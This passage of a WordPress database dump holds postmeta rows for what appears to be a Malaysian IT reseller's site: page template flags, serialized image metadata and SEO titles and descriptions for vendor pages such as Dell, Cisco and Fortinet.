php'),(1336,1576,'_hide_page_title',''),(1337,1576,'_hide_header',''),(1338,1576,'_hide_footer',''),(1339,1576,'_hide_breadcrumb',''),(1340,1576,'_cover',''),(1341,1576,'_show_excerpt',''),(1342,1576,'_wc_apply_product',''),(1343,1577,'_edit_last','1'),(1344,1577,'_wp_page_template','template-fullwidth.php'),(1345,1577,'_hide_page_title',''),(1346,1577,'_hide_header',''),(1347,1577,'_hide_footer',''),(1348,1577,'_hide_breadcrumb',''),(1349,1577,'_cover',''),(1350,1577,'_show_excerpt',''),(1351,1577,'_wc_apply_product',''),(1352,1578,'_edit_last','1'),(1353,1578,'_wp_page_template','template-fullwidth.php'),(1354,1578,'_hide_page_title',''),(1355,1578,'_hide_header',''),(1356,1578,'_hide_footer',''),(1357,1578,'_hide_breadcrumb',''),(1358,1578,'_cover',''),(1359,1578,'_show_excerpt',''),(1360,1578,'_wc_apply_product',''),(1361,1579,'_edit_last','1'),(1362,1579,'_wp_page_template','template-fullwidth.php'),(1363,1579,'_hide_page_title',''),(1364,1579,'_hide_header',''),(1365,1579,'_hide_footer',''),(1366,1579,'_hide_breadcrumb',''),(1367,1579,'_cover',''),(1368,1579,'_show_excerpt',''),(1369,1579,'_wc_apply_product',''),(1370,1580,'_edit_last','1'),(1371,1580,'_wp_page_template','template-fullwidth.php'),(1372,1580,'_hide_page_title',''),(1373,1580,'_hide_header',''),(1374,1580,'_hide_footer',''),(1375,1580,'_hide_breadcrumb',''),(1376,1580,'_cover',''),(1377,1580,'_show_excerpt',''),(1378,1580,'_wc_apply_product',''),(1379,1581,'_edit_last','1'),(1380,1581,'_wp_page_template','template-fullwidth.php'),(1381,1581,'_hide_page_title',''),(1382,1581,'_hide_header',''),(1383,1581,'_hide_footer',''),(1384,1581,'_hide_breadcrumb',''),(1385,1581,'_cover',''),(1386,1581,'_show_excerpt',''),(1387,1581,'_wc_apply_product',''),(1388,1597,'_edit_lock','1545145018:1'),(1389,1597,'_edit_last','1'),(1390,1597,'_wp_page_template','template-fullwidth.php'),(1391,1597,'_hide_page_title',''),(1392,1597,'_hide_header',''),(1393,1597,'_hide_footer',''),(1394,1597,'_hide_breadcrumb',''),(1395,1597,'_cover',''),(1396,1597,'_show_excerpt',''),(1397,1597,'_wc_apply_product',''),(1398,1598,'_edit_lock','1544770194:1'),(1399,1598,'_edit_last','1'),(1400,1598,'_wp_page_template','template-fullwidth.php'),(1401,1598,'_hide_page_title',''),(1402,1598,'_hide_header',''),(1403,1598,'_hide_footer',''),(1404,1598,'_hide_breadcrumb',''),(1405,1598,'_cover',''),(1406,1598,'_show_excerpt',''),(1407,1598,'_wc_apply_product',''),(1408,1599,'_edit_lock','1544769210:1'),(1409,1599,'_edit_last','1'),(1410,1603,'_wp_attached_file','2018/12/adobe.png'),(1411,1600,'_edit_lock','1544753624:1'),(1412,1603,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:1170;s:4:\"file\";s:17:\"2018/12/adobe.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"adobe-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"adobe-300x293.png\";s:5:\"width\";i:300;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"adobe-768x749.png\";s:5:\"width\";i:768;s:6:\"height\";i:749;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"adobe-1024x998.png\";s:5:\"width\";i:1024;s:6:\"height\";i:998;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:17:\"adobe-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:17:\"adobe-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:17:\"adobe-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1413,1600,'_edit_last','1'),(1414,1600,'_wp_page_template','template-fullwidth.php'),(1415,1600,'_hide_page_title',''),(1416,1600,'_hide_header',''),(1417,1600,'_hide_footer',''),(1418,1600,'_hide_breadcrumb',''),(1419,1600,'_cover',''),(1420,1600,'_show_excerpt',''),(1421,1600,'_wc_apply_product',''),(1422,1605,'_edit_lock','1544754082:1'),(1423,1605,'_edit_last','1'),(1424,1606,'_edit_lock','1544755650:1'),(1425,1606,'_edit_last','1'),(1426,1606,'_wp_page_template','template-fullwidth.php'),(1427,1606,'_hide_page_title',''),(1428,1606,'_hide_header',''),(1429,1606,'_hide_footer',''),(1430,1606,'_hide_breadcrumb',''),(1431,1606,'_cover',''),(1432,1606,'_show_excerpt',''),(1433,1606,'_wc_apply_product',''),(1434,1608,'_edit_lock','1544756172:1'),(1435,1608,'_edit_last','1'),(1436,1608,'_wp_page_template','template-fullwidth.php'),(1437,1608,'_hide_page_title',''),(1438,1608,'_hide_header',''),(1439,1608,'_hide_footer',''),(1440,1608,'_hide_breadcrumb',''),(1441,1608,'_cover',''),(1442,1608,'_show_excerpt',''),(1443,1608,'_wc_apply_product',''),(1444,1609,'_edit_lock','1544769449:1'),(1445,1609,'_edit_last','1'),(1446,1609,'_wp_page_template','template-fullwidth.php'),(1447,1609,'_hide_page_title',''),(1448,1609,'_hide_header',''),(1449,1609,'_hide_footer',''),(1450,1609,'_hide_breadcrumb',''),(1451,1609,'_cover',''),(1452,1609,'_show_excerpt',''),(1453,1609,'_wc_apply_product',''),(1454,1610,'_edit_lock','1544756167:1'),(1455,1610,'_edit_last','1'),(1456,1610,'_wp_page_template','template-fullwidth.php'),(1457,1610,'_hide_page_title',''),(1458,1610,'_hide_header',''),(1459,1610,'_hide_footer',''),(1460,1610,'_hide_breadcrumb',''),(1461,1610,'_cover',''),(1462,1610,'_show_excerpt',''),(1463,1610,'_wc_apply_product',''),(1465,1612,'_edit_lock','1544769448:1'),(1466,1612,'_edit_last','1'),(1467,1612,'_wp_page_template','template-fullwidth.php'),(1468,1612,'_hide_page_title',''),(1469,1612,'_hide_header',''),(1470,1612,'_hide_footer',''),(1471,1612,'_hide_breadcrumb',''),(1472,1612,'_cover',''),(1473,1612,'_show_excerpt',''),(1474,1612,'_wc_apply_product',''),(1475,1617,'_edit_lock','1544761202:1'),(1476,1617,'_edit_last','1'),(1477,1617,'_wp_page_template','template-fullwidth.php'),(1478,1617,'_hide_page_title',''),(1479,1617,'_hide_header',''),(1480,1617,'_hide_footer',''),(1481,1617,'_hide_breadcrumb',''),(1482,1617,'_cover',''),(1483,1617,'_show_excerpt',''),(1484,1617,'_wc_apply_product',''),(1485,1618,'_edit_lock','1544761161:1'),(1486,1618,'_edit_last','1'),(1487,1618,'_wp_page_template','template-fullwidth.php'),(1488,1618,'_hide_page_title',''),(1489,1618,'_hide_header',''),(1490,1618,'_hide_footer',''),(1491,1618,'_hide_breadcrumb',''),(1492,1618,'_cover',''),(1493,1618,'_show_excerpt',''),(1494,1618,'_wc_apply_product',''),(1495,1619,'_edit_lock','1545143428:1'),(1496,1619,'_edit_last','1'),(1497,1619,'_wp_page_template','template-fullwidth.php'),(1498,1619,'_hide_page_title',''),(1499,1619,'_hide_header',''),(1500,1619,'_hide_footer',''),(1501,1619,'_hide_breadcrumb',''),(1502,1619,'_cover',''),(1503,1619,'_show_excerpt',''),(1504,1619,'_wc_apply_product',''),(1505,1620,'_edit_lock','1553137018:1'),(1506,1620,'_edit_last','1'),(1507,1620,'_wp_page_template','template-fullwidth.php'),(1508,1620,'_hide_page_title',''),(1509,1620,'_hide_header',''),(1510,1620,'_hide_footer',''),(1511,1620,'_hide_breadcrumb',''),(1512,1620,'_cover',''),(1513,1620,'_show_excerpt',''),(1514,1620,'_wc_apply_product',''),(1517,1599,'_wp_page_template','template-fullwidth.php'),(1518,1599,'_hide_page_title',''),(1519,1599,'_hide_header',''),(1520,1599,'_hide_footer',''),(1521,1599,'_hide_breadcrumb',''),(1522,1599,'_cover',''),(1523,1599,'_show_excerpt',''),(1524,1599,'_wc_apply_product',''),(1525,1605,'_wp_page_template','template-fullwidth.php'),(1526,1605,'_hide_page_title',''),(1527,1605,'_hide_header',''),(1528,1605,'_hide_footer',''),(1529,1605,'_hide_breadcrumb',''),(1530,1605,'_cover',''),(1531,1605,'_show_excerpt',''),(1532,1605,'_wc_apply_product',''),(1533,1631,'_edit_lock','1569228293:1'),(1534,1631,'_edit_last','1'),(1535,1632,'_edit_lock','1569828000:1'),(1536,1632,'_edit_last','1'),(1537,1634,'_edit_lock','1569831093:1'),(1538,1633,'_edit_lock','1569832290:1'),(1539,1635,'_edit_last','1'),(1540,1635,'_edit_lock','1569228204:1'),(1541,1633,'_edit_last','1'),(1542,1636,'_edit_last','1'),(1543,1636,'_edit_lock','1569228296:1'),(1544,1632,'_wp_page_template','template-fullwidth.php'),(1545,1632,'_hide_page_title',''),(1546,1632,'_hide_header',''),(1547,1632,'_hide_footer',''),(1548,1632,'_hide_breadcrumb',''),(1549,1632,'_cover',''),(1550,1632,'_show_excerpt',''),(1551,1632,'_wc_apply_product',''),(1552,1633,'_wp_page_template','template-fullwidth.php'),(1553,1633,'_hide_page_title',''),(1554,1633,'_hide_header',''),(1555,1633,'_hide_footer',''),(1556,1633,'_hide_breadcrumb',''),(1557,1633,'_cover',''),(1558,1633,'_show_excerpt',''),(1559,1633,'_wc_apply_product',''),(1560,1634,'_edit_last','1'),(1561,1634,'_wp_page_template','template-fullwidth.php'),(1562,1634,'_hide_page_title',''),(1563,1634,'_hide_header',''),(1564,1634,'_hide_footer',''),(1565,1634,'_hide_breadcrumb',''),(1566,1634,'_cover',''),(1567,1634,'_show_excerpt',''),(1568,1634,'_wc_apply_product',''),(1569,1436,'_yoast_wpseo_content_score','30'),(1570,1646,'_wp_attached_file','2018/12/networking-overview_1_AP330_580x320.jpg'),(1571,1646,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:580;s:6:\"height\";i:320;s:4:\"file\";s:47:\"2018/12/networking-overview_1_AP330_580x320.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"networking-overview_1_AP330_580x320-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"networking-overview_1_AP330_580x320-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:47:\"networking-overview_1_AP330_580x320-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:47:\"networking-overview_1_AP330_580x320-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:45:\"networking-overview_1_AP330_580x320-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1572,1648,'_wp_attached_file','2018/12/Networking_Overview_Page_Module_2_580x320.jpg'),(1573,1648,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:580;s:6:\"height\";i:320;s:4:\"file\";s:53:\"2018/12/Networking_Overview_Page_Module_2_580x320.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"Networking_Overview_Page_Module_2_580x320-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"Networking_Overview_Page_Module_2_580x320-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:53:\"Networking_Overview_Page_Module_2_580x320-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:53:\"Networking_Overview_Page_Module_2_580x320-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:51:\"Networking_Overview_Page_Module_2_580x320-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1574,1649,'_wp_attached_file','2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320.jpg'),(1575,1649,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:580;s:6:\"height\";i:320;s:4:\"file\";s:50:\"2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:50:\"SD_Launch-SD-WAN_Page_Module_3_580x320-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:50:\"SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:50:\"SD_Launch-SD-WAN_Page_Module_3_580x320-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:50:\"SD_Launch-SD-WAN_Page_Module_3_580x320-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:48:\"SD_Launch-SD-WAN_Page_Module_3_580x320-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1576,1650,'_wp_attached_file','2018/12/security-analytics_module-5_580x320.jpg'),(1577,1650,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:580;s:6:\"height\";i:320;s:4:\"file\";s:47:\"2018/12/security-analytics_module-5_580x320.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"security-analytics_module-5_580x320-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"security-analytics_module-5_580x320-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:47:\"security-analytics_module-5_580x320-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:47:\"security-analytics_module-5_580x320-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:45:\"security-analytics_module-5_580x320-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1578,1631,'_yoast_wpseo_focuskw','gotomeeting'),(1579,1631,'_yoast_wpseo_title','GoToMeeting: Online Meeting Software with HD Video Conferencing%%page%% %%sep%% %%sitename%% (Authorised Reseller for GoToMeeting in Malaysia'),(1580,1631,'_yoast_wpseo_metadesc','GoToMeeting web conferencing software makes it simple and cost-effective to collaborate online with colleagues and customers in real time.'),(4587,1426,'_yoast_wpseo_meta-robots-noindex','1'),(1582,1631,'_yoast_wpseo_content_score','60'),(1583,1651,'_wp_attached_file','2018/12/networking-overview-module5_580x320.jpg'),(1584,1651,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:580;s:6:\"height\";i:320;s:4:\"file\";s:47:\"2018/12/networking-overview-module5_580x320.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"networking-overview-module5_580x320-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"networking-overview-module5_580x320-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:47:\"networking-overview-module5_580x320-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:47:\"networking-overview-module5_580x320-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:45:\"networking-overview-module5_580x320-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1585,1440,'_yoast_wpseo_content_score','60'),(1586,1655,'_wp_attached_file','2018/12/netinsight-resolve-issues.jpg'),(1587,1655,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:580;s:6:\"height\";i:320;s:4:\"file\";s:37:\"2018/12/netinsight-resolve-issues.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"netinsight-resolve-issues-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"netinsight-resolve-issues-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:37:\"netinsight-resolve-issues-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:37:\"netinsight-resolve-issues-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:35:\"netinsight-resolve-issues-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1854,1345,'_thumbnail_id','1670'),(1840,1375,'_yoast_wpseo_metadesc','Cloud File Sharing and Storage'),(1841,1375,'_yoast_wpseo_content_score','60'),(1842,1673,'_wp_attachment_image_alt','Dell Logo'),(1900,1771,'_wp_attachment_image_alt','DELL EMC logo'),(1844,1370,'_yoast_wpseo_metadesc','PCs & Displays, Networking, Data Protection, Servers and Data Storage'),(1845,1370,'_yoast_wpseo_content_score','60'),(1846,1672,'_wp_attachment_image_alt','Cisco Logo'),(1847,1363,'_thumbnail_id','3227'),(1848,1363,'_yoast_wpseo_content_score','60'),(1849,1671,'_wp_attachment_image_alt','Bitdefender logo'),(1850,1353,'_thumbnail_id','1671'),(1851,1353,'_yoast_wpseo_metadesc','Endpoint Security & Cyber Threats'),(1852,1353,'_yoast_wpseo_content_score','30'),(1853,1670,'_wp_attachment_image_alt','Barracuda Logo'),(1720,1679,'_wp_attachment_image_alt','GoToTraining'),(1721,1636,'_thumbnail_id','3233'),(1722,1636,'_yoast_wpseo_content_score','60'),(2471,1435,'_yoast_wpseo_linkdex','52'),(2470,1435,'_yoast_wpseo_focuskw','Acronis'),(1769,1719,'_wp_attachment_image_alt','Toughbook Logo V2'),(1770,1418,'_thumbnail_id','1719'),(1771,1418,'_yoast_wpseo_metadesc','Rugged Laptop and Rugged Tablet'),(1772,1418,'_yoast_wpseo_content_score','60'),(1773,1703,'_wp_attachment_image_alt','Palo Alto'),(1774,1416,'_thumbnail_id','1703'),(1775,1416,'_yoast_wpseo_metadesc','Next-Generation Firewall, Cloud Security, Endpoint Protection'),(1776,1416,'_yoast_wpseo_content_score','60'),(1592,1440,'_yoast_wpseo_focuskw','Aruba'),(1593,1440,'_yoast_wpseo_linkdex','76'),(1594,1438,'_yoast_wpseo_content_score','60'),(1839,1375,'_thumbnail_id','1674'),(1787,1700,'_wp_attachment_image_alt','Microsoft Logo'),(1788,1407,'_thumbnail_id','1700'),(1789,1407,'_yoast_wpseo_content_score','60'),(1790,1699,'_wp_attachment_image_alt','McAfee Logo'),(1791,1323,'_thumbnail_id','1716'),(1792,1323,'_yoast_wpseo_metadesc','Laptop and desktop PCs, tablets, smartphones, monitors, projectors and cloud solutions'),(1793,1323,'_yoast_wpseo_content_score','90'),(1794,1403,'_thumbnail_id','3230'),(1795,1403,'_yoast_wpseo_metadesc','Device Control Endpoint Protection for SMB Endpoint SecurityWeb GatewayWeb Protection'),(1796,1403,'_yoast_wpseo_content_score','60'),(1800,6,'_yoast_wpseo_title','%%sitename%%'),(1799,6,'_yoast_wpseo_content_score','30'),(1801,6,'_yoast_wpseo_metadesc','BINTARA is a multi-brand technology solutions provider to business, government, education and healthcare organisations in Malaysia. We help our clients achieve their goals by delivering integrated solutions and services that maximise their technology investment.'),(1802,1313,'_yoast_wpseo_content_score','60'),(1803,1693,'_wp_attachment_image_alt','Lenovo Logo'),(1804,1398,'_thumbnail_id','3231'),(1805,1398,'_yoast_wpseo_content_score','60'),(1806,1685,'_wp_attachment_image_alt','Kingston Logo'),(1807,1396,'_thumbnail_id','1685'),(1808,1396,'_yoast_wpseo_content_score','60'),(1809,1691,'_wp_attachment_image_alt','Kaspersky Logo'),(1810,1395,'_thumbnail_id','3239'),(1811,1395,'_yoast_wpseo_content_score','60'),(1812,1683,'_wp_attachment_image_alt','Juniper Logo'),(1813,1394,'_thumbnail_id','1683'),(1814,1394,'_yoast_wpseo_content_score','60'),(1815,1682,'_wp_attachment_image_alt','Jabra Logo'),(1816,1393,'_thumbnail_id','1682'),(1817,1393,'_yoast_wpseo_metadesc','Office headsets'),(1818,1393,'_yoast_wpseo_content_score','60'),(1819,1443,'_yoast_wpseo_content_score','60'),(1820,1681,'_wp_attachment_image_alt','HP Logo V2'),(1821,1385,'_thumbnail_id','1681'),(1822,1385,'_yoast_wpseo_content_score','60'),(1823,1443,'_yoast_wpseo_focuskw','ATLAS.ti'),(1824,1443,'_yoast_wpseo_linkdex','81'),(1825,1382,'_thumbnail_id','1677'),(1826,1382,'_yoast_wpseo_metadesc','Network Security Infrastructure Protection Application Security Threat Detection & Prevention'),(1827,1382,'_yoast_wpseo_content_score','60'),(1828,1677,'_wp_attachment_image_alt','Fortinet Logo'),(1829,1444,'_yoast_wpseo_content_score','60'),(1830,1676,'_wp_attachment_image_alt','ergotron logo'),(1831,1378,'_thumbnail_id','3240'),(1832,1378,'_yoast_wpseo_metadesc','Standing Desks, Monitor Mounts, Mobile Carts'),(1833,1378,'_yoast_wpseo_content_score','90'),(1834,1675,'_wp_attachment_image_alt','Epson Logo'),(1835,1376,'_thumbnail_id','1675'),(1836,1376,'_yoast_wpseo_metadesc','Projectors and Printers'),(1837,1376,'_yoast_wpseo_content_score','60'),(1838,1674,'_wp_attachment_image_alt','Dropbox logo'),(1603,1668,'_wp_attached_file','2018/12/APC-Logo.jpg'),(1604,1668,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:20:\"2018/12/APC-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"APC-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"APC-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"APC-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"APC-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"APC-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"APC-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"APC-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:18:\"APC-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1